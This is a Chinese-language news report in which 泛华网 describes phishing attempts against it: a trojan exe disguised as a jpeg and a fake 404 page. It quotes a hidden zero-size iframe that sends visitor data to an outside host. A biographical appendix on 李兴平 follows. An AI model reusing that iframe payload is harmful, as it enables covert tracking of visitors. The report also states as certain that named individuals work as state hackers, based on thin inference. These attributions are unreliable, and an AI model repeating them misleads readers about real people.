泛华网实录：泛华网遭到网络攻击！！！

近日，世界各地多家媒体曝料中共是如何操纵黑客展开网络战的。这里，泛华网以自身受到的攻击作为一个实例向读者介绍中共是如何在网络上掌握你的资料，并向各位介绍泛华网是如何进行调查的。

泛华网在2013年1月18日报道了泛华网收到谷歌的通知，自1月7日起，泛华网和泛华网曝料专用电邮（见本页右下角）受到来历不明的网络攻击。攻击包括试图重新设置密码等。不仅如此，随后的几天里，泛华网还收到假冒曝料的电邮，试图获取泛华网办公室的IP地址并在泛华网的电脑里安装木马软件。在这个假冒曝料的电邮有两个链接，一个是压缩文件的下载地址，另一个是html文件地址。压缩文件里有两个文件，一个是jpeg图像文件，另一个是exe可执行文件，但文件名中含有jpeg字样。泛华网的工作人员认为压缩文件以exe可执行文件存放是有可能的，但使用了一台不连网的专用电脑运行了这个exe可执行文件。解压的结果并不是图像文件，而是试图安装木马病毒。

点击那个html链接，得到是Error 404 (Not Found)的页面，但有很多英文错误，比如“If you has any problem, please insult Google.”。Insult Google？工作略微显得粗糙了点。但是，察看源码，可以看到<iframe_src=“http://web.vxea.com/fh/back.php”_height=0_width=0>这样的内容。将iframe的尺寸设置为零，本身就显示出这是有阴谋的源码。这段源码是将任何点击这个页面的用户的资料，包括IP地址传送回http://web.vxea.com/fh/back.php。

查询vxea.com的注册资料，发现这个域名属于Chong Qing EV Science Tech Co. Ltd.，注册人是JingYu Liu。进一步调查vxea.com，泛华网发现计算机安全公司Sophos已经正式确认木马病毒Troj/DwnLdr-KLZ自动将信息送回给包括vxea.com在内的三个地址。vxea.com用于接收木马送回资料的地址是http://www.vxea.com/themes/rss.php。Sophos的报告在http://www.sophos.com/fr-fr/threat-center/threat-analyses/viruses-and-spyware/Troj~DwnLdr-KLZ/detailed-analysis.aspx可以看到。

进入vxea.com，出乎意料，vxea.com就是在中国赫赫有名的ip138.com网站。网站ip138由李兴平创立，提供网上实用工具。李兴平创立的网站还包括hao123.com等。显然，网站ip138.com是个合法生意。但显然，ip138.com就是黑客背台网站vxea.com。到目前为止，至少vxea.com的两个地址与黑客活动密切相关，并且操作者直接使用php背后的MySQL数据库来收取黑客盗来的资料。这说明ip138.com不可能是另一个被黑客入侵的网站，而操作者只可能是ip138.com背后的程序员。不仅如此，源码<iframe_src=“http://web.vxea.com/fh/back.php”_height=0_width=0>并不含有中毒者标注性的参数，因此，这不是一个通用性程序，而是一个具有针对性的特定编写的程序。不然，操作者将无法识别反馈回来的资料来自哪个中毒者。这一次，在这一个时间段，这个程序被专门用于针对泛华网。泛华网感到泛华网的面子稍稍大了点。

在随后的几个星期里，泛华网特意留意了与李兴平有关的几个网站，果然发现有点击直接来自hao123.com网站司务器中隐藏的内部工作链接（搜索引擎并没有这个链接）。李兴平不是已经将hao123.com卖给了百度了吗？有消息说，他基本上不再管理hao123，由百度的员工负责日常管理，只是在hao123有比较重大调整的时候，百度才会和他沟通一下。泛华网的调查显示，管理hao123.com的员工仍然是李兴平的团队。

问题是，作为一个商人，李兴平为什么要参与这种只有中国政府的谍报机关才感兴趣的黑客活动？泛华网没有找到答案，最大的可能是，中国政府已经成为李兴平的客户，正在利用李兴平团队的技术力量大规模地研发木马病毒和入侵个人电脑的技术手段来刺探情报。

假冒向泛华网曝料的人使用了名字Liu Si Ye，刘四，刘乐辉，和Liu Le Hui。当泛华网直率地询问他/她是不是Liu Jing Yu时，并没有得到答复。不过，到现在为止，可以确定的事是，李兴平的团队被中国政府招募为网络部队的一支，这个团队以重庆为基地，在使用网站ip138.com的背台资源从事网络刺探情报的黑客活动。Liu Jing Yu和重庆EV科技公司是这次黑客行为的背后操作者。

泛华网报道。

附：

李兴平是何许人？

网站ip138由传奇站长李兴平创立的，提供了大量实用网上工具，包括天气预报-预报五天、国内列车时刻表查询、手机号码所在地区查询、阴阳转换万年历、汉字简体繁体转换、国内国际机票查询、手机型号大全查询、五笔编码拼音查询、在线翻译、货币汇率转贴工具、在线度衡量转换器、邮编查询区号查询、身份证号码查询验证、快递查询、全国各地车牌查询表、EMS查询等。虽然网站界面非常简单，拥有的网页数非常少，但每天积聚了上百万的流量。

李兴平堪称为中国第一个人站长，top500中文网站中，他的个人旗下还有hao123中文排行第5；qq163中文排行223名；ip138中文排行192名；3533手机网中文排行153名；以及FLASH130动漫和FLASH在线欣赏。据网上资料，李兴平，1979年出生于广东兴宁县，父母均为当地农民，兴平初中毕业后即返家谋生。2005年前第一次出远门，地点是深圳。1999年，网络在中国逐渐普及，兴宁市（1993兴宁改县为市）也开始有了网吧。这时，开始迷上了上网的李兴平在当地网吧找了一份网吧管理员的工作。

因为要帮人攒电脑赚钱，他需要用网络查询配件报价之类的信息，很快他发觉在网上找资料非常困难，当时的中文网站不仅内容不够丰富，数量有限，而且要把那些用英文字母表示的网址一个个记下来，并不是一件容易的事情。于是，他想到一个解决办法，设计了一个个人网页，把他认为好的网站搜集在一起，并和它们建立链接。当下次上网时，他就很方便地直接进入这些常用的网站。

网吧管理员的身份让李兴平天天泡在网上，泡在那些打游戏、聊天、上网的网民中。很快，他发现来网吧的很多人都不知道如何上网，上网后又不知道去哪里找到所需要的内容。当时的上网费很贵，时间与金钱却往往在茫然不知所措中奢侈地流失。

他设计的简陋的个人主页开始发挥神奇的功效。他开始有意识地去做网站地址搜集分类工作，爱琢磨的他想到要做一个“网址大全”式的东西。半年后，李兴平的个人主页开始有了Hao123的雏形，他当时给它的名字就是“网址大全”。他把当时中国排名前5000位的站点进行分门别类，按用途组合在一起。随后他开始做一些点击广告以及网站联盟等，随着流量增大，网站的固定广告业随之而来。

hao123创始人李兴平表示，他已经投资了视频分享网站155.com，但他现在多数时间在“和朋友一起玩”，并不介入网站的具体管理。不过李兴平表示，他在等待新的机会，将来会自己再去创业。李兴平表示，在将导航网站hao123卖给百度后，他基本上也不再管理hao123，由百度的员工负责日常管理。只是在hao123有比较重大调整的时候，百度才会和他沟通一下。据李兴平透露，他投资了155.com一二百万，持有近40%的股份，但他平时并不负责管理，主要由合作伙伴刘卫武打理。李兴平承认目前视频网站很多，155.com并无把握成功。此了155.com外，李兴平还投资了小游戏网站4399.com，IP地址查询网站IP138.com，手机资讯网站3533.com等不少中小互联网项目，不过他在这些项目上投入的精力都不多。李兴平表示，和做个人网站相比，自己创业“非常累”，但将来他肯定会去创业，只是现在还没有发现好的项目，也没有明确的计划。

李兴平曾在网吧做管理员，1999年5月建了网址导航站hao123.com。hao123页面非常简单，只是各类网站的导航列表，但在国内拥有很多用户。2004年8月，百度以1190万元和4万股股票收购了hao123，2006年谷歌(Google)在进入中国市场后后不久，投资了另一家导航网站265.com。

对于为什么会卖掉已经收入不菲的个人网站，李兴平承认一个很重要的原因就是自己已经确实无法找到网站下一步的发展方向，同时喜好单打独斗的他也拒绝与别人进行合作。事实上，他甚至拒绝了IDG的投资机会。一个没有技术、商业模式、业务营销策略的网站为何受到主流商业网站的器重，它的商业价值在哪儿？百度CEO李彦宏对此的评价是：“正是由于它的简单，简单到你无法去超越它。”李彦宏认为，互联网用户存在两极：一端是搜索引擎的使用者，一端是导航站的使用者。随着互联网用户的增加，导航站的使用率、用户数还会增长，其中有一部分会转变到使用搜索引擎。百度收购hao123，就是要把这两块最大的互联网人群都揽入自己公司的怀中。而hao123就能真正知道互联网上的“菜鸟”到底需要的是什么。在李兴平的协助下，hao123网站在收购后流量仍然蒸蒸日上，也证明了这一需求并不会随着时间的改变而改变。

李兴平对中国互联网用户的理解是60%～70%都属于“菜鸟”，而真正能为这些用户提供服务的是个人网站，而不是那些“互联网精英”。正是由于了解这一群用户，李兴平的hao123才具备了被百度垂青的价值。在决定卖掉hao123的那段时间里，李兴平压力很大，一方面当然是单打独斗的他不知道自己以后的方向，另一方面就是来自主流商业网站给他施加的压力，无奈之下没有任何资源的李兴平只有接受招安。

hao123.com主页一直只有李兴平一个人在管理，低调的他一直在“偷偷地”做这件事，他身边的朋友甚至不知道他就是Hao123网站的站长。当然，他的工作量也很大，“一天大概有6—7个是在检查、更新链接。但链接太多，我不可能每天都全部检查，因此我经常担心某些网站含有非法链接，压力和工作量都很大”。因为起步早，一直到2002年左右，hao123.com主页都没有出现强有力的竞争对手。一直到2003年“265”等网站出现时，Hao123的浏览量已经达到一定的规模，牢牢占据着导航网站的第一名的位置。

创始人李兴平的初中学历、网吧短暂工作的经历，这些在创办hao123.com主页过程中反而成为一种优势——正因为不懂，才能深切体会到普通人上网的难处，才有了为普通人上网提供了方便的hao123.com主页。有人认为hao123.com主页的成功是中国互联网发展的一个奇迹，是一桩不可复制的“偶然事件”。但是，细细探究Hao123的创业发展历程和分析它的成功法则，正是创始人李兴平本身既是网站老板又是客户这种“两位一体”的身份，所带来的天然的基于客户体验的敏感性，以及能够随时随地听从于这种敏感性的呼唤而做出反应与改进的行为，构成了Hao123这个看上去没有核心竞争力的网站的竞争力。